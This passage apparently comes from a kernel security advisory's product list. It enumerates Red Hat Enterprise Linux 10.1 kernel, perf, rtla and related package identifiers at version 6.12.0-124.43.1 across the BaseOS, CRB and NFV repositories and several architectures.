"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
